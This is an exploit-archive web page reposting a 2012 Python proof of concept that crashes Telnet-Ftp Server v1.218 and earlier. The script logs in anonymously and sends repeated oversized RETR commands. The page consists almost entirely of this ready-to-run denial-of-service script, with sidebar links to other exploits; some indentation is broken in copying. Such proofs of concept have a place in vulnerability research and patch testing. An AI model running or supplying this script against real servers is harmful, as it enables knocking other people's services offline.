首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Telnet-Ftp Server <=v1.218 Remote Crash PoC
来源:www.localh0t.com.ar 作者:localh0t 发布时间:2012-03-20  
#!/usr/bin/python

# Telnet-Ftp Server <=v1.218 Remote Crash PoC
# written by localh0t
# Date: 19/03/12
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar

from socket import *
import sys, struct, os

if (len(sys.argv) < 3):
print "\nTelnet-Ftp Server <=v1.218 Remote Crash PoC"
        print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
sys.exit()


def checkDefaultUser(username,password):
if username == '' and password == '':
username = "anonymous"
password = "anonymous@test.com"
else:
pass
return username,password

def createUser():
username = raw_input("[!] Insert username (default: anonymous)> ")
password = raw_input("[!] Insert password (default: anonymous@test.com)> ")
return checkDefaultUser(username,password)

(username,password) = createUser()

print "\n[!] Connecting to %s ..." %(sys.argv[1])

# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)

print "[!] USERNAME: " + username

sock.send("USER " + username + "\r\n")
sock.recv(1024)

print "[!] PASSWORD: " + password

sock.send("PASS " + password + "\r\n")
sock.recv(1024)

print "[!] Sending payload..."

payload = "RETR " + ("X" * 1000) + "\r\n"

for i in range (1, 5):
sock.send(payload)
sock.recv(1024)

sock.close()
print "[!] Exploit succeed. Target should crashed."
sys.exit()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VLC v. 2.0.1.0 .voc Memory Cor
·VLC v. 2.0.1.0 .jls DOS
·at32 Reverse Proxy 1.060.310 D
·VLC v. 2.0.1.0 .tta Memory Cor
·PeerFTP Server <=v4.01 Remote
·2X ApplicationServer 10.1 TuxS
·Tiny Server <= 1.1.9 HTTP HEAD
·2X Client for RDP 10.1.1204 Cl
·Android FTPServer 1.9.0 Remote
·LANDesk Lenovo ThinkManagement
·NetBSD-ftpd 20100320 Remote DD
·LANDesk Lenovo ThinkManagement
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved